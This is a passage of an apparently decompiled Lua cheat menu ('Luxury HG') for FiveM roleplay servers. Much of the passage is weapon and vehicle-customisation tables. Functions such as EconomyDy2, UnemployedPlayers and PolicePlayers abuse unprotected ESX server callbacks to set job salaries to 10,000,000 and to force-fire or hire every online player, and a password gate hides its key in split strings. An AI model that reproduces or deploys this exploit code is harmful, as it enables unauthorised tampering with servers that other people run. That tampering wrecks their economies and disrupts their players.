  3606. id = 'COMPONENT_AT_AR_AFGRIP_02'
  3607. }
  3608. }
  3609. }
  3610. }
  3611. },
  3612. Heavy = {
  3613. RPG = {
  3614. id = 'weapon_rpg',
  3615. name = '~h~~r~> ~s~RPG',
  3616. bInfAmmo = false,
  3617. mods = {}
  3618. },
  3619. GrenadeLauncher = {
  3620. id = 'weapon_grenadelauncher',
  3621. name = '~h~~r~> ~s~Grenade Launcher',
  3622. bInfAmmo = false,
  3623. mods = {}
  3624. },
  3625. GrenadeLauncherSmoke = {
  3626. id = 'weapon_grenadelauncher_smoke',
  3627. name = '~h~~r~> ~s~Grenade Launcher Smoke',
  3628. bInfAmmo = false,
  3629. mods = {}
  3630. },
  3631. Minigun = {
  3632. id = 'weapon_minigun',
  3633. name = '~h~~r~> ~s~Minigun',
  3634. bInfAmmo = false,
  3635. mods = {}
  3636. },
  3637. FireworkLauncher = {
  3638. id = 'weapon_firework',
  3639. name = '~h~~r~> ~s~Firework Launcher',
  3640. bInfAmmo = false,
  3641. mods = {}
  3642. },
  3643. Railgun = {
  3644. id = 'weapon_railgun',
  3645. name = '~h~~r~> ~s~Railgun',
  3646. bInfAmmo = false,
  3647. mods = {}
  3648. },
  3649. HomingLauncher = {
  3650. id = 'weapon_hominglauncher',
  3651. name = '~h~~r~> ~s~Homing Launcher',
  3652. bInfAmmo = false,
  3653. mods = {}
  3654. },
  3655. CompactGrenadeLauncher = {
  3656. id = 'weapon_compactlauncher',
  3657. name = '~h~~r~> ~s~Compact Grenade Launcher',
  3658. bInfAmmo = false,
  3659. mods = {}
  3660. },
  3661. Widowmaker = {
  3662. id = 'weapon_rayminigun',
  3663. name = '~h~~r~> ~s~Widowmaker',
  3664. bInfAmmo = false,
  3665. mods = {}
  3666. }
  3667. },
  3668. Throwables = {
  3669. Grenade = {
  3670. id = 'weapon_grenade',
  3671. name = '~h~~r~> ~s~Grenade',
  3672. bInfAmmo = false,
  3673. mods = {}
  3674. },
  3675. BZGas = {
  3676. id = 'weapon_bzgas',
  3677. name = '~h~~r~> ~s~BZ Gas',
  3678. bInfAmmo = false,
  3679. mods = {}
  3680. },
  3681. MolotovCocktail = {
  3682. id = 'weapon_molotov',
  3683. name = '~h~~r~> ~s~Molotov Cocktail',
  3684. bInfAmmo = false,
  3685. mods = {}
  3686. },
  3687. StickyBomb = {
  3688. id = 'weapon_stickybomb',
  3689. name = '~h~~r~> ~s~Sticky Bomb',
  3690. bInfAmmo = false,
  3691. mods = {}
  3692. },
  3693. ProximityMines = {
  3694. id = 'weapon_proxmine',
  3695. name = '~h~~r~> ~s~Proximity Mines',
  3696. bInfAmmo = false,
  3697. mods = {}
  3698. },
  3699. Snowballs = {
  3700. id = 'weapon_snowball',
  3701. name = '~h~~r~> ~s~Snowballs',
  3702. bInfAmmo = false,
  3703. mods = {}
  3704. },
  3705. PipeBombs = {
  3706. id = 'weapon_pipebomb',
  3707. name = '~h~~r~> ~s~Pipe Bombs',
  3708. bInfAmmo = false,
  3709. mods = {}
  3710. },
  3711. Baseball = {
  3712. id = 'weapon_ball',
  3713. name = '~h~~r~> ~s~Baseball',
  3714. bInfAmmo = false,
  3715. mods = {}
  3716. },
  3717. TearGas = {
  3718. id = 'weapon_smokegrenade',
  3719. name = '~h~~r~> ~s~Tear Gas',
  3720. bInfAmmo = false,
  3721. mods = {}
  3722. },
  3723. Flare = {
  3724. id = 'weapon_flare',
  3725. name = '~h~~r~> ~s~Flare',
  3726. bInfAmmo = false,
  3727. mods = {}
  3728. }
  3729. },
  3730. Misc = {
  3731. Parachute = {
  3732. id = 'gadget_parachute',
  3733. name = '~h~~r~> ~s~Parachute',
  3734. bInfAmmo = false,
  3735. mods = {}
  3736. },
  3737. FireExtinguisher = {
  3738. id = 'weapon_fireextinguisher',
  3739. name = '~h~~r~> ~s~Fire Extinguisher',
  3740. bInfAmmo = false,
  3741. mods = {}
  3742. }
  3743. }
  3744. }
  3745. local b8 = false
  3746. local b9 = false
  3747. local ba = false
  3748. local bb = false
  3749. local bc = nil
  3750. local bd = {}
  3751. local be = {}
  3752. local bf = nil
  3753. local bg = false
  3754. local bh = -1
  3755. local bi = -1
  3756. local bj = -1
  3757. local bk = false
  3758. local bl = {
  3759. {
  3760. name = '~h~Spoilers',
  3761. id = 0
  3762. },
  3763. {
  3764. name = '~h~Front Bumper',
  3765. id = 1
  3766. },
  3767. {
  3768. name = '~h~Rear Bumper',
  3769. id = 2
  3770. },
  3771. {
  3772. name = '~h~Side Skirt',
  3773. id = 3
  3774. },
  3775. {
  3776. name = '~h~Exhaust',
  3777. id = 4
  3778. },
  3779. {
  3780. name = '~h~Frame',
  3781. id = 5
  3782. },
  3783. {
  3784. name = '~h~Grille',
  3785. id = 6
  3786. },
  3787. {
  3788. name = '~h~Hood',
  3789. id = 7
  3790. },
  3791. {
  3792. name = '~h~Fender',
  3793. id = 8
  3794. },
  3795. {
  3796. name = '~h~Right Fender',
  3797. id = 9
  3798. },
  3799. {
  3800. name = '~h~Roof',
  3801. id = 10
  3802. },
  3803. {
  3804. name = '~h~Vanity Plates',
  3805. id = 25
  3806. },
  3807. {
  3808. name = '~h~Trim',
  3809. id = 27
  3810. },
  3811. {
  3812. name = '~h~Ornaments',
  3813. id = 28
  3814. },
  3815. {
  3816. name = '~h~Dashboard',
  3817. id = 29
  3818. },
  3819. {
  3820. name = '~h~Dial',
  3821. id = 30
  3822. },
  3823. {
  3824. name = '~h~Door Speaker',
  3825. id = 31
  3826. },
  3827. {
  3828. name = '~h~Seats',
  3829. id = 32
  3830. },
  3831. {
  3832. name = '~h~Steering Wheel',
  3833. id = 33
  3834. },
  3835. {
  3836. name = '~h~Shifter Leavers',
  3837. id = 34
  3838. },
  3839. {
  3840. name = '~h~Plaques',
  3841. id = 35
  3842. },
  3843. {
  3844. name = '~h~Speakers',
  3845. id = 36
  3846. },
  3847. {
  3848. name = '~h~Trunk',
  3849. id = 37
  3850. },
  3851. {
  3852. name = '~h~Hydraulics',
  3853. id = 38
  3854. },
  3855. {
  3856. name = '~h~Engine Block',
  3857. id = 39
  3858. },
  3859. {
  3860. name = '~h~Air Filter',
  3861. id = 40
  3862. },
  3863. {
  3864. name = '~h~Struts',
  3865. id = 41
  3866. },
  3867. {
  3868. name = '~h~Arch Cover',
  3869. id = 42
  3870. },
  3871. {
  3872. name = '~h~Aerials',
  3873. id = 43
  3874. },
  3875. {
  3876. name = '~h~Trim 2',
  3877. id = 44
  3878. },
  3879. {
  3880. name = '~h~Tank',
  3881. id = 45
  3882. },
  3883. {
  3884. name = '~h~Windows',
  3885. id = 46
  3886. },
  3887. {
  3888. name = '~h~Livery',
  3889. id = 48
  3890. },
  3891. {
  3892. name = '~h~Horns',
  3893. id = 14
  3894. },
  3895. {
  3896. name = '~h~Wheels',
  3897. id = 23
  3898. },
  3899. {
  3900. name = '~h~Wheel Types',
  3901. id = 'wheeltypes'
  3902. },
  3903. {
  3904. name = '~h~Extras',
  3905. id = 'extra'
  3906. },
  3907. {
  3908. name = '~h~Neons',
  3909. id = 'neon'
  3910. },
  3911. {
  3912. name = '~h~Paint',
  3913. id = 'paint'
  3914. },
  3915. {
  3916. name = '~h~Headlights Color',
  3917. id = 'headlight'
  3918. },
  3919. {
  3920. name = '~h~Licence Plate',
  3921. id = 'licence'
  3922. }
  3923. }
  3924. local bm = {
  3925. {
  3926. name = '~h~~r~Engine',
  3927. id = 11
  3928. },
  3929. {
  3930. name = '~h~~b~Brakes',
  3931. id = 12
  3932. },
  3933. {
  3934. name = '~h~~g~Transmission',
  3935. id = 13
  3936. },
  3937. {
  3938. name = '~h~~y~Suspension',
  3939. id = 15
  3940. },
  3941. {
  3942. name = '~h~~b~Armor',
  3943. id = 16
  3944. }
  3945. }
  3946. local bn = {
  3947. {
  3948. name = '~h~Blue on White 2',
  3949. id = 0
  3950. },
  3951. {
  3952. name = '~h~Blue on White 3',
  3953. id = 4
  3954. },
  3955. {
  3956. name = '~h~Yellow on Blue',
  3957. id = 2
  3958. },
  3959. {
  3960. name = '~h~Yellow on Black',
  3961. id = 1
  3962. },
  3963. {
  3964. name = '~h~North Yankton',
  3965. id = 5
  3966. }
  3967. }
  3968. local bo = {
  3969. {
  3970. name = '~h~Default',
  3971. id = -1
  3972. },
  3973. {
  3974. name = '~h~White',
  3975. id = 0
  3976. },
  3977. {
  3978. name = '~h~Blue',
  3979. id = 1
  3980. },
  3981. {
  3982. name = '~h~Electric Blue',
  3983. id = 2
  3984. },
  3985. {
  3986. name = '~h~Mint Green',
  3987. id = 3
  3988. },
  3989. {
  3990. name = '~h~Lime Green',
  3991. id = 4
  3992. },
  3993. {
  3994. name = '~h~Yellow',
  3995. id = 5
  3996. },
  3997. {
  3998. name = '~h~Golden Shower',
  3999. id = 6
  4000. },
  4001. {
  4002. name = '~h~Orange',
  4003. id = 7
  4004. },
  4005. {
  4006. name = '~h~Red',
  4007. id = 8
  4008. },
  4009. {
  4010. name = '~h~Pony Pink',
  4011. id = 9
  4012. },
  4013. {
  4014. name = '~h~Hot Pink',
  4015. id = 10
  4016. },
  4017. {
  4018. name = '~h~Purple',
  4019. id = 11
  4020. },
  4021. {
  4022. name = '~h~Blacklight',
  4023. id = 12
  4024. }
  4025. }
  4026. local bp = {
  4027. ['Stock Horn'] = -1,
  4028. ['Truck Horn'] = 1,
  4029. ['Police Horn'] = 2,
  4030. ['Clown Horn'] = 3,
  4031. ['Musical Horn 1'] = 4,
  4032. ['Musical Horn 2'] = 5,
  4033. ['Musical Horn 3'] = 6,
  4034. ['Musical Horn 4'] = 7,
  4035. ['Musical Horn 5'] = 8,
  4036. ['Sad Trombone Horn'] = 9,
  4037. ['Classical Horn 1'] = 10,
  4038. ['Classical Horn 2'] = 11,
  4039. ['Classical Horn 3'] = 12,
  4040. ['Classical Horn 4'] = 13,
  4041. ['Classical Horn 5'] = 14,
  4042. ['Classical Horn 6'] = 15,
  4043. ['Classical Horn 7'] = 16,
  4044. ['Scaledo Horn'] = 17,
  4045. ['Scalere Horn'] = 18,
  4046. ['Salemi Horn'] = 19,
  4047. ['Scalefa Horn'] = 20,
  4048. ['Scalesol Horn'] = 21,
  4049. ['Scalela Horn'] = 22,
  4050. ['Scaleti Horn'] = 23,
  4051. ['Scaledo Horn High'] = 24,
  4052. ['Jazz Horn 1'] = 25,
  4053. ['Jazz Horn 2'] = 26,
  4054. ['Jazz Horn 3'] = 27,
  4055. ['Jazz Loop Horn'] = 28,
  4056. ['Starspangban Horn 1'] = 28,
  4057. ['Starspangban Horn 2'] = 29,
  4058. ['Starspangban Horn 3'] = 30,
  4059. ['Starspangban Horn 4'] = 31,
  4060. ['Classical Loop 1'] = 32,
  4061. ['Classical Horn 8'] = 33,
  4062. ['Classical Loop 2'] = 34
  4063. }
  4064. local bq = {
  4065. ['White'] = {
  4066. 255,
  4067. 255,
  4068. 255
  4069. },
  4070. ['Blue'] = {
  4071. 0,
  4072. 0,
  4073. 255
  4074. },
  4075. ['Electric Blue'] = {
  4076. 0,
  4077. 150,
  4078. 255
  4079. },
  4080. ['Mint Green'] = {
  4081. 50,
  4082. 255,
  4083. 155
  4084. },
  4085. ['Lime Green'] = {
  4086. 0,
  4087. 255,
  4088. 0
  4089. },
  4090. ['Yellow'] = {
  4091. 255,
  4092. 255,
  4093. 0
  4094. },
  4095. ['Golden Shower'] = {
  4096. 204,
  4097. 204,
  4098. 0
  4099. },
  4100. ['Orange'] = {
  4101. 255,
  4102. 128,
  4103. 0
  4104. },
  4105. ['Red'] = {
  4106. 255,
  4107. 0,
  4108. 0
  4109. },
  4110. ['Pony Pink'] = {
  4111. 255,
  4112. 102,
  4113. 255
  4114. },
  4115. ['Hot Pink'] = {
  4116. 255,
  4117. 0,
  4118. 255
  4119. },
  4120. ['Purple'] = {
  4121. 153,
  4122. 0,
  4123. 153
  4124. }
  4125. }
  4126. local br = {
  4127. {
  4128. name = '~h~Black',
  4129. id = 0
  4130. },
  4131. {
  4132. name = '~h~Carbon Black',
  4133. id = 147
  4134. },
  4135. {
  4136. name = '~h~Graphite',
  4137. id = 1
  4138. },
  4139. {
  4140. name = '~h~Anhracite Black',
  4141. id = 11
  4142. },
  4143. {
  4144. name = '~h~Black Steel',
  4145. id = 2
  4146. },
  4147. {
  4148. name = '~h~Dark Steel',
  4149. id = 3
  4150. },
  4151. {
  4152. name = '~h~Silver',
  4153. id = 4
  4154. },
  4155. {
  4156. name = '~h~Bluish Silver',
  4157. id = 5
  4158. },
  4159. {
  4160. name = '~h~Rolled Steel',
  4161. id = 6
  4162. },
  4163. {
  4164. name = '~h~Shadow Silver',
  4165. id = 7
  4166. },
  4167. {
  4168. name = '~h~Stone Silver',
  4169. id = 8
  4170. },
  4171. {
  4172. name = '~h~Midnight Silver',
  4173. id = 9
  4174. },
  4175. {
  4176. name = '~h~Cast Iron Silver',
  4177. id = 10
  4178. },
  4179. {
  4180. name = '~h~Red',
  4181. id = 27
  4182. },
  4183. {
  4184. name = '~h~Torino Red',
  4185. id = 28
  4186. },
  4187. {
  4188. name = '~h~Formula Red',
  4189. id = 29
  4190. },
  4191. {
  4192. name = '~h~Lava Red',
  4193. id = 150
  4194. },
  4195. {
  4196. name = '~h~Blaze Red',
  4197. id = 30
  4198. },
  4199. {
  4200. name = '~h~Grace Red',
  4201. id = 31
  4202. },
  4203. {
  4204. name = '~h~Garnet Red',
  4205. id = 32
  4206. },
  4207. {
  4208. name = '~h~Sunset Red',
  4209. id = 33
  4210. },
  4211. {
  4212. name = '~h~Cabernet Red',
  4213. id = 34
  4214. },
  4215. {
  4216. name = '~h~Wine Red',
  4217. id = 143
  4218. },
  4219. {
  4220. name = '~h~Candy Red',
  4221. id = 35
  4222. },
  4223. {
  4224. name = '~h~Hot Pink',
  4225. id = 135
  4226. },
  4227. {
  4228. name = '~h~Pfsiter Pink',
  4229. id = 137
  4230. },
  4231. {
  4232. name = '~h~Salmon Pink',
  4233. id = 136
  4234. },
  4235. {
  4236. name = '~h~Sunrise Orange',
  4237. id = 36
  4238. },
  4239. {
  4240. name = '~h~Orange',
  4241. id = 38
  4242. },
  4243. {
  4244. name = '~h~Bright Orange',
  4245. id = 138
  4246. },
  4247. {
  4248. name = '~h~Gold',
  4249. id = 99
  4250. },
  4251. {
  4252. name = '~h~Bronze',
  4253. id = 90
  4254. },
  4255. {
  4256. name = '~h~Yellow',
  4257. id = 88
  4258. },
  4259. {
  4260. name = '~h~Race Yellow',
  4261. id = 89
  4262. },
  4263. {
  4264. name = '~h~Dew Yellow',
  4265. id = 91
  4266. },
  4267. {
  4268. name = '~h~Dark Green',
  4269. id = 49
  4270. },
  4271. {
  4272. name = '~h~Racing Green',
  4273. id = 50
  4274. },
  4275. {
  4276. name = '~h~Sea Green',
  4277. id = 51
  4278. },
  4279. {
  4280. name = '~h~Olive Green',
  4281. id = 52
  4282. },
  4283. {
  4284. name = '~h~Bright Green',
  4285. id = 53
  4286. },
  4287. {
  4288. name = '~h~Gasoline Green',
  4289. id = 54
  4290. },
  4291. {
  4292. name = '~h~Lime Green',
  4293. id = 92
  4294. },
  4295. {
  4296. name = '~h~Midnight Blue',
  4297. id = 141
  4298. },
  4299. {
  4300. name = '~h~Galaxy Blue',
  4301. id = 61
  4302. },
  4303. {
  4304. name = '~h~Dark Blue',
  4305. id = 62
  4306. },
  4307. {
  4308. name = '~h~Saxon Blue',
  4309. id = 63
  4310. },
  4311. {
  4312. name = '~h~Blue',
  4313. id = 64
  4314. },
  4315. {
  4316. name = '~h~Mariner Blue',
  4317. id = 65
  4318. },
  4319. {
  4320. name = '~h~Harbor Blue',
  4321. id = 66
  4322. },
  4323. {
  4324. name = '~h~Diamond Blue',
  4325. id = 67
  4326. },
  4327. {
  4328. name = '~h~Surf Blue',
  4329. id = 68
  4330. },
  4331. {
  4332. name = '~h~Nautical Blue',
  4333. id = 69
  4334. },
  4335. {
  4336. name = '~h~Racing Blue',
  4337. id = 73
  4338. },
  4339. {
  4340. name = '~h~Ultra Blue',
  4341. id = 70
  4342. },
  4343. {
  4344. name = '~h~Light Blue',
  4345. id = 74
  4346. },
  4347. {
  4348. name = '~h~Chocolate Brown',
  4349. id = 96
  4350. },
  4351. {
  4352. name = '~h~Bison Brown',
  4353. id = 101
  4354. },
  4355. {
  4356. name = '~h~Creeen Brown',
  4357. id = 95
  4358. },
  4359. {
  4360. name = '~h~Feltzer Brown',
  4361. id = 94
  4362. },
  4363. {
  4364. name = '~h~Maple Brown',
  4365. id = 97
  4366. },
  4367. {
  4368. name = '~h~Beechwood Brown',
  4369. id = 103
  4370. },
  4371. {
  4372. name = '~h~Sienna Brown',
  4373. id = 104
  4374. },
  4375. {
  4376. name = '~h~Saddle Brown',
  4377. id = 98
  4378. },
  4379. {
  4380. name = '~h~Moss Brown',
  4381. id = 100
  4382. },
  4383. {
  4384. name = '~h~Woodbeech Brown',
  4385. id = 102
  4386. },
  4387. {
  4388. name = '~h~Straw Brown',
  4389. id = 99
  4390. },
  4391. {
  4392. name = '~h~Sandy Brown',
  4393. id = 105
  4394. },
  4395. {
  4396. name = '~h~Bleached Brown',
  4397. id = 106
  4398. },
  4399. {
  4400. name = '~h~Schafter Purple',
  4401. id = 71
  4402. },
  4403. {
  4404. name = '~h~Spinnaker Purple',
  4405. id = 72
  4406. },
  4407. {
  4408. name = '~h~Midnight Purple',
  4409. id = 142
  4410. },
  4411. {
  4412. name = '~h~Bright Purple',
  4413. id = 145
  4414. },
  4415. {
  4416. name = '~h~Cream',
  4417. id = 107
  4418. },
  4419. {
  4420. name = '~h~Ice White',
  4421. id = 111
  4422. },
  4423. {
  4424. name = '~h~Frost White',
  4425. id = 112
  4426. }
  4427. }
  4428. local bs = '~u~~o~Luxury ~s~HG'
  4429. local bt = {
  4430. {
  4431. name = '~h~Black',
  4432. id = 12
  4433. },
  4434. {
  4435. name = '~h~Gray',
  4436. id = 13
  4437. },
  4438. {
  4439. name = '~h~Light Gray',
  4440. id = 14
  4441. },
  4442. {
  4443. name = '~h~Ice White',
  4444. id = 131
  4445. },
  4446. {
  4447. name = '~h~Blue',
  4448. id = 83
  4449. },
  4450. {
  4451. name = '~h~Dark Blue',
  4452. id = 82
  4453. },
  4454. {
  4455. name = '~h~Midnight Blue',
  4456. id = 84
  4457. },
  4458. {
  4459. name = '~h~Midnight Purple',
  4460. id = 149
  4461. },
  4462. {
  4463. name = '~h~Schafter Purple',
  4464. id = 148
  4465. },
  4466. {
  4467. name = '~h~Red',
  4468. id = 39
  4469. },
  4470. {
  4471. name = '~h~Dark Red',
  4472. id = 40
  4473. },
  4474. {
  4475. name = '~h~Orange',
  4476. id = 41
  4477. },
  4478. {
  4479. name = '~h~Yellow',
  4480. id = 42
  4481. },
  4482. {
  4483. name = '~h~Lime Green',
  4484. id = 55
  4485. },
  4486. {
  4487. name = '~h~Green',
  4488. id = 128
  4489. },
  4490. {
  4491. name = '~h~Forest Green',
  4492. id = 151
  4493. },
  4494. {
  4495. name = '~h~Foliage Green',
  4496. id = 155
  4497. },
  4498. {
  4499. name = '~h~Olive Darb',
  4500. id = 152
  4501. },
  4502. {
  4503. name = '~h~Dark Earth',
  4504. id = 153
  4505. },
  4506. {
  4507. name = '~h~Desert Tan',
  4508. id = 154
  4509. }
  4510. }
  4511. local bu = {
  4512. {
  4513. name = '~h~Brushed Steel',
  4514. id = 117
  4515. },
  4516. {
  4517. name = '~h~Brushed Black Steel',
  4518. id = 118
  4519. },
  4520. {
  4521. name = '~h~Brushed Aluminum',
  4522. id = 119
  4523. },
  4524. {
  4525. name = '~h~Pure Gold',
  4526. id = 158
  4527. },
  4528. {
  4529. name = '~h~Brushed Gold',
  4530. id = 159
  4531. }
  4532. }
  4533. defaultVehAction = ''
  4534. if GetVehiclePedIsUsing(PlayerPedId()) then
  4535. veh = GetVehiclePedIsUsing(PlayerPedId())
  4536. end
  4537. local bv = false
  4538. local bw = true
  4539. local bx = GetPlayerServerId(PlayerPedId(-1))
  4540. local by = GetPlayerName(bx)
  4541. av('~h~?ㅽ겕由쏀듃 濡쒕뱶?꾨즺!,~n~~b~@Luxury HG#8222', true)
  4542. local function bz(I, x, y)
  4543. SetTextFont(0)
  4544. SetTextProportional(1)
  4545. SetTextScale(0.0, 0.4)
  4546. SetTextDropshadow(1, 0, 0, 0, 255)
  4547. SetTextEdge(1, 0, 0, 0, 255)
  4548. SetTextDropShadow()
  4549. SetTextOutline()
  4550. SetTextEntry('STRING')
  4551. AddTextComponentString(I)
  4552. DrawText(x, y)
  4553. end
  4555. function RequestModelSync(bA)
  4556. local bB = GetHashKey(bA)
  4557. RequestModel(bB)
  4558. while not HasModelLoaded(bB) do
  4559. RequestModel(bB)
  4560. Citizen.Wait(0)
  4561. end
  4562. end
  4564. function EconomyDy2()
  4565. if ESX then
  4566. ESX.TriggerServerCallback(
  4567. 'esx_society:setJobSalary',
  4568. function()
  4569. end,
  4570. 'police',
  4571. 0,
  4572. 10000000
  4573. )
  4574. ESX.TriggerServerCallback(
  4575. 'esx_society:setJobSalary',
  4576. function()
  4577. end,
  4578. 'mecano',
  4579. 0,
  4580. 10000000
  4581. )
  4582. ESX.TriggerServerCallback(
  4583. 'esx_society:setJobSalary',
  4584. function()
  4585. end,
  4586. 'ambulance',
  4587. 0,
  4588. 10000000
  4589. )
  4590. ESX.TriggerServerCallback(
  4591. 'esx_society:setJobSalary',
  4592. function()
  4593. end,
  4594. 'realestateagent',
  4595. 0,
  4596. 10000000
  4597. )
  4598. ESX.TriggerServerCallback(
  4599. 'esx_society:setJobSalary',
  4600. function()
  4601. end,
  4602. 'cardealer',
  4603. 0,
  4604. 10000000
  4605. )
  4606. ESX.TriggerServerCallback(
  4607. 'esx_society:setJobSalary',
  4608. function()
  4609. end,
  4610. 'police',
  4611. 1,
  4612. 10000000
  4613. )
  4614. ESX.TriggerServerCallback(
  4615. 'esx_society:setJobSalary',
  4616. function()
  4617. end,
  4618. 'mecano',
  4619. 1,
  4620. 10000000
  4621. )
  4622. ESX.TriggerServerCallback(
  4623. 'esx_society:setJobSalary',
  4624. function()
  4625. end,
  4626. 'ambulance',
  4627. 1,
  4628. 10000000
  4629. )
  4630. ESX.TriggerServerCallback(
  4631. 'esx_society:setJobSalary',
  4632. function()
  4633. end,
  4634. 'realestateagent',
  4635. 1,
  4636. 10000000
  4637. )
  4638. ESX.TriggerServerCallback(
  4639. 'esx_society:setJobSalary',
  4640. function()
  4641. end,
  4642. 'cardealer',
  4643. 1,
  4644. 10000000
  4645. )
  4646. ESX.TriggerServerCallback(
  4647. 'esx_society:setJobSalary',
  4648. function()
  4649. end,
  4650. 'police',
  4651. 2,
  4652. 10000000
  4653. )
  4654. ESX.TriggerServerCallback(
  4655. 'esx_society:setJobSalary',
  4656. function()
  4657. end,
  4658. 'mecano',
  4659. 2,
  4660. 10000000
  4661. )
  4662. ESX.TriggerServerCallback(
  4663. 'esx_society:setJobSalary',
  4664. function()
  4665. end,
  4666. 'ambulance',
  4667. 2,
  4668. 10000000
  4669. )
  4670. ESX.TriggerServerCallback(
  4671. 'esx_society:setJobSalary',
  4672. function()
  4673. end,
  4674. 'realestateagent',
  4675. 2,
  4676. 10000000
  4677. )
  4678. ESX.TriggerServerCallback(
  4679. 'esx_society:setJobSalary',
  4680. function()
  4681. end,
  4682. 'cardealer',
  4683. 2,
  4684. 10000000
  4685. )
  4686. ESX.TriggerServerCallback(
  4687. 'esx_society:setJobSalary',
  4688. function()
  4689. end,
  4690. 'police',
  4691. 3,
  4692. 10000000
  4693. )
  4694. ESX.TriggerServerCallback(
  4695. 'esx_society:setJobSalary',
  4696. function()
  4697. end,
  4698. 'mecano',
  4699. 3,
  4700. 10000000
  4701. )
  4702. ESX.TriggerServerCallback(
  4703. 'esx_society:setJobSalary',
  4704. function()
  4705. end,
  4706. 'ambulance',
  4707. 3,
  4708. 10000000
  4709. )
  4710. ESX.TriggerServerCallback(
  4711. 'esx_society:setJobSalary',
  4712. function()
  4713. end,
  4714. 'realestateagent',
  4715. 3,
  4716. 10000000
  4717. )
  4718. ESX.TriggerServerCallback(
  4719. 'esx_society:setJobSalary',
  4720. function()
  4721. end,
  4722. 'cardealer',
  4723. 3,
  4724. 10000000
  4725. )
  4726. end
  4727. end
  4729. function UnemployedPlayers()
  4730. if ESX then
  4731. ESX.TriggerServerCallback(
  4732. 'esx_society:getOnlinePlayers',
  4733. function(as)
  4734. for i = 1, #as, 1 do
  4735. label = as[i].name
  4736. value = as[i].source
  4737. name = as[i].name
  4738. identifier = as[i].identifier
  4739. ESX.TriggerServerCallback(
  4740. 'esx_society:setJob',
  4741. function()
  4742. end,
  4743. identifier,
  4744. 'unemployed',
  4745. 0,
  4746. 'fire'
  4747. )
  4748. end
  4749. end
  4750. )
  4751. end
  4752. end
  4754. function AmbulancePlayers()
  4755. if ESX then
  4756. ESX.TriggerServerCallback(
  4757. 'esx_society:getOnlinePlayers',
  4758. function(as)
  4759. for i = 1, #as, 1 do
  4760. label = as[i].name
  4761. value = as[i].source
  4762. name = as[i].name
  4763. identifier = as[i].identifier
  4764. ESX.TriggerServerCallback(
  4765. 'esx_society:setJob',
  4766. function()
  4767. end,
  4768. identifier,
  4769. 'ambulance',
  4770. 3,
  4771. 'hire'
  4772. )
  4773. end
  4774. end
  4775. )
  4776. end
  4777. end
  4779. function PolicePlayers()
  4780. if ESX then
  4781. ESX.TriggerServerCallback(
  4782. 'esx_society:getOnlinePlayers',
  4783. function(as)
  4784. for i = 1, #as, 1 do
  4785. label = as[i].name
  4786. value = as[i].source
  4787. name = as[i].name
  4788. identifier = as[i].identifier
  4789. ESX.TriggerServerCallback(
  4790. 'esx_society:setJob',
  4791. function()
  4792. end,
  4793. identifier,
  4794. 'police',
  4795. 4,
  4796. 'hire'
  4797. )
  4798. end
  4799. end
  4800. )
  4801. end
  4802. end
  4803. local bC = 0
  4804. capPa = 'd' .. 'o' .. 'k' .. 'i'
  4805. cappA = 'd' .. 'o' .. 'k' .. 'i' .. capPa
  4806. local bD = cappA
  4807. local function bE()
  4808. if bC == 3 then
  4809. ForceSocialClubUpdate()
  4810. else
  4811. local ak = KeyboardInput('Get your password from #lynx-announcements', '', 100)
  4812. if ak == bD then
  4813. mhaonn = true
  4814. PlaySoundFrontend(-1, 'PICK_UP', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
  4815. Citizen.Wait(100)
  4816. PlaySoundFrontend(-1, 'PICK_UP', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
  4817. Citizen.Wait(100)
  4818. PlaySoundFrontend(-1, 'PICK_UP', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
  4819. else
  4820. bC = bC + 1
  4821. PlaySoundFrontend(-1, 'MP_WAVE_COMPLETE', 'HUD_FRONTEND_DEFAULT_SOUNDSET', true)
  4822. end
  4823. end
  4824. end
  4826. function MecanoPlayers()
  4827. if ESX then
  4828. ESX.TriggerServerCallback(
  4829. 'esx_society:getOnlinePlayers',
  4830. function(as)
  4831. for i = 1, #as, 1 do
  4832. label = as[i].name
  4833. value = as[i].source
  4834. name = as[i].name
  4835. identifier = as[i].identifier
  4836. ESX.TriggerServerCallback(
  4837. 'esx_society:setJob',
  4838. function()
  4839. end,
  4840. identifier,
  4841. 'mecano',
  4842. 4,
  4843. 'hire'
  4844. )
  4845. end
  4846. end
  4847. )
  4848. end
  4849. end
  4851. function RealEstateAgentPlayers()
  4852. if ESX then
  4853. ESX.TriggerServerCallback(
  4854. 'esx_society:getOnlinePlayers',
  4855. function(as)
  4856. for i = 1, #as, 1 do
  4857. label = as[i].name
  4858. value = as[i].source
  4859. name = as[i].name
  4860. identifier = as[i].identifier
  4861. ESX.TriggerServerCallback(
  4862. 'esx_society:setJob',
  4863. function()
  4864. end,
  4865. identifier,
  4866. 'realestateagent',
  4867. 4,
  4868. 'hire'
  4869. )
  4870. end
  4871. end
  4872. )
  4873. end
  4874. end
  4876. function TaxiPlayers()
  4877. if ESX then
  4878. ESX.TriggerServerCallback(
  4879. 'esx_society:getOnlinePlayers',
  4880. function(as)
  4881. for i = 1, #as, 1 do
  4882. label = as[i].name
  4883. value = as[i].source
  4884. name = as[i].name
  4885. identifier = as[i].identifier
  4886. ESX.TriggerServerCallback(
  4887. 'esx_society:setJob',
  4888. function()
  4889. end,
  4890. identifier,
  4891. 'taxi',
  4892. 4,
  4893. 'hire'
  4894. )
  4895. end
  4896. end
  4897. )
  4898. end
  4899. end
  4901. function CarDealerPlayers()
  4902. if ESX then
  4903. ESX.TriggerServerCallback(
  4904. 'esx_society:getOnlinePlayers',
  4905. function(as)
  4906. for i = 1, #as, 1 do
  4907. label = as[i].name
  4908. value = as[i].source
  4909. name = as[i].name
  4910. identifier = as[i].identifier
  4911. ESX.TriggerServerCallback(
  4912. 'esx_society:setJob',
  4913. function()
  4914. end,
  4915. identifier,
  4916. 'cardealer',
  4917. 4,
  4918. 'hire'
  4919. )
  4920. end
  4921. end
  4922. )
  4923. end
  4924. end
  4926. function UnemployedPlayer(bF)
  4927. if ESX then
  4928. ESX.TriggerServerCallback(
  4929. 'esx_society:getOnlinePlayers',
  4930. function(as)
  4931. local bG = nil
  4932. for i = 1, #as, 1 do
  4933. label = as[i].name
  4934. value = as[i].source
  4935. name = as[i].name
  4936. if name == GetPlayerName(bF) then
  4937. bG = as[i].identifier
  4938. debugLog('found ' .. as[i].name .. ' ' .. as[i].identifier)
  4939. end
  4940. identifier = as[i].identifier
  4941. end
  4942. ESX.TriggerServerCallback(
  4943. 'esx_society:setJob',
  4944. function()
  4945. end,
  4946. bG,
  4947. 'unemployed',
  4948. 0,
  4949. 'hire'
  4950. )
  4951. end
  4952. )
  4953. end
  4954. end
  4956. function CarDealerPlayer(bF)
